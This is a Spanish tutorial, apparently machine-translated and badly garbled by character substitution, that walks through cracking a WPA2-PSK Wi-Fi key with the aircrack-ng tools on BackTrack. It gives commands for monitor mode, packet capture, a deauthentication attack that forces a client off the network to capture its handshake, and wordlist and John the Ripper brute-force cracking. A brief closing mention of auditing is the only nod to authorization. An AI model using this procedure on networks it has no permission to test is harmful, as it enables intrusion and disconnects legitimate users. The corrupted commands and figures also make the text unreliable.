Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Cracking WPA PSK BackTrack 3,4,5
Cracking WPA PSK BackTrack 3,4,5
Poner la interfaz en modo monitor Buscar red inalmbrica (protegida con WPA2 y una clave previamente compartida) Capturar todos los paquetes spere !asta que vea a un cliente y des"autenticaci#n el cliente$ por lo que el apret#n de manos puede ser capturado Crac%ear la clave usando un arc!ivo de diccionario (o por medio de &o!n '!e (ipper) )oy a usar una interfaz de *lin% *W+",-22 (./B) de red inalmbrica para este procedimiento0 n bac%trac%1$ este dispositivo se reconoce como 2lan30
root6bt578 airmon"ng start 2lan3 9nterface 2ifi3 at!3 at!2lan3 C!ipset At!eros At!eros At!eros (alin% 2:;< ./B *river mad2ifi"ng mad2ifi"ng )AP (parent5 2ifi3) mad2ifi"ng )AP (parent5 2ifi3) rt;<usb " =p!y3> (monitor mode enabled on mon3)
?% a!ora podemos utilizar la interfaz mon3 )amos a encontrar una red inalmbrica que utiliza WPA2 @ P/A5
root6bt578 airodump"ng mon3 CB C >= lapsed5 1 s >= 233D"32"2- -25:; PW( "<< /'A'9?F 335-C5BG5D35:B5A< Beacons : 8*ata$ 8@s 3 PW( "2D 3 CB -3 EB :1 +ost -2 FC C9PB ( A.'B P/A Probe 'estFet //9* 'estFet
(ate 3" -
n este punto$ usted tiene dos opciones5 o bien esperar a que un cliente se conecta y el 1"Way Bands!a%e se !aya completado$ o des"autenticaci#n un cliente eHistente$ por lo que la fuerza para volver a asociar0 l tiempo es dinero$ asI que vamos a obligar a los des"autenticaci#n0 Fecesitamos que el bssid de la AP ("a) y el Eac de un cliente conectado ("c)
root6bt578 aireplay"ng "3 - "a 335-D5:B5:25A*5G; "c 335-C5BG5D35:B5A< mon3 -<5315-D Waiting for beacon frame (B//9*5 335-D5:B5:25A*5G;) on c!annel -3 -<531523 /ending C1 directed *eAut!0 /'EAC5 =335-C5BG5D35:B5A<> =C;JCC ACAs>
Como consecuencia$ airodump"ng deber indicar KApret#n de manos WPA5K en la esquina superior derec!a
CB -3 >= B//9* 335-D5:B5:25A*5G; B//9* 335-D5:B5:25A*5G; lapsed5 2 mins >= 233D"32"2- -<531 >= WPA !ands!a%e5 335-D5:B5:25A*5G; PW( (LM "<< -33 /'A'9?F 335-C5BG5D35:B5A< Beacons -<<N PW( "2; 8*ata$ 8@s DD (ate :1":1 3 CB -3 +ost 3 EB :1 FC C9PB ( A.'B P/A //9* 'estFet
Gorma de este momento$ usted no necesita estar cerca de la red inalmbrica0 'odas las grietas que suceder en lInea$ para que pueda de4ar airodump y otros procesos e incluso a pie de la AP0 *e !ec!o$ me permito sugerir a pie y se encuentra un lugar acogedor donde se puede vivir$ comer$ dormir$ etc 0000 (omper una clave WPA2"P/A se basa en la fuerza bruta$ y puede tomar un tiempo muy muy largo0 Bay dos formas de fuerza bruta5 una que es relativamente rpido$ pero no garantiza el QHito y uno que es muy lento$ pero garantiza que se encuentra la clave en algOn momento en el tiempo +a primera opci#n es el uso de un arc!ivo de lista de traba4o @ drstionary0 Euc!os de estos arc!ivos se pueden encontrar en 9nternet (por e4emplo$ o en 2220t!eargon0com pac%etstorm (ver los arc!ivos))$ o pueden ser generados con !erramientas como &o!n '!e (ipper0 .na vez que la lista de palabras se crea$ todo lo que necesita !acer es e4ecutar aircrac%"ng con la lista de traba4o y alimentar la G9 0 'apa que contiene el protocolo de intercambio WPA20 AsI que si su lista de palabras se llama 2ord0lst (en @ tmp @ listas de palabras)$ puede e4ecutar
aircrac%"ng R2 @tmp@2ordlists@2ord0lst "b 335-D5:B5:25A*5G; @tmp@2pa2P0cap
l QHito de crac%ing la clave WPA2"P/A est directamente relacionado con la fuerza de su arc!ivo de contraseSas0 n otras palabras$ puede que tenga suerte y consigue la llave muy rpido$ o puede que no obtenga la clave en absoluto0 l segundo mQtodo (fuerza bruta) ser un QHito seguro$ pero puede tomar aSos en completarse0 'enga en cuenta$ una clave WPA2 puede ser de !asta C1 caracteres$ por lo que en teorIa serIa la construcci#n de todas las combinaciones de contraseSa con todos los 4uegos de caracteres posibles y darles de comer a aircrac%0 /i desea utilizar &o!n
'!e (ipper para crear todas las posibles combinaciones de contraseSas y darles de comer en aircrac%"ng$ este es el comando a utilizar5
root6bt578 @pentest@pass2ord@4tr@4o!n ""stdout ""incremental5all J aircrac%"ng "b 335-D5:B5:25A*5G; "2 " @tmp@2pa2P0cap
Actualizaci#n5 *espuQs de 23 !oras de formaci#n de grietas$ la clave aOn no se !a encontrado0 l sistema que estoy usando para romper las claves no es muy rpido$ pero ec!emos un vistazo a algunos !ec!os5 N caracteres$ caracteres sin formato (mayOsculas y minOsculas) o dIgitos T cada persona4e en la clave podrIan tiene 2C 2C -3 (C2) combinaciones posibles0 Por lo que el nOmero mHimo de combinaciones que deben ser verificados en el proceso de fuerza bruta es de C2 P C2 P C2 P C2 P C2 P C2 P C2 P C2 T 2-N <13 -3: :N1 NDC a alrededor de C33 claves por segundo en mi KlentitudK del sistema$ podrIa tomar ms de -3-3N<<N2 !oras para encontrar la clave (--$:<D aSos)0 Be de4ado el proceso de formaci#n de grietas en mi mquina es demasiado lento para obtener la clave$ mientras que todavIa estoy vivo 000 AsI que piensa en esto cuando se !ace una auditorIa WPA2"P/A0
Corelam 'eam
se respeta los derec!os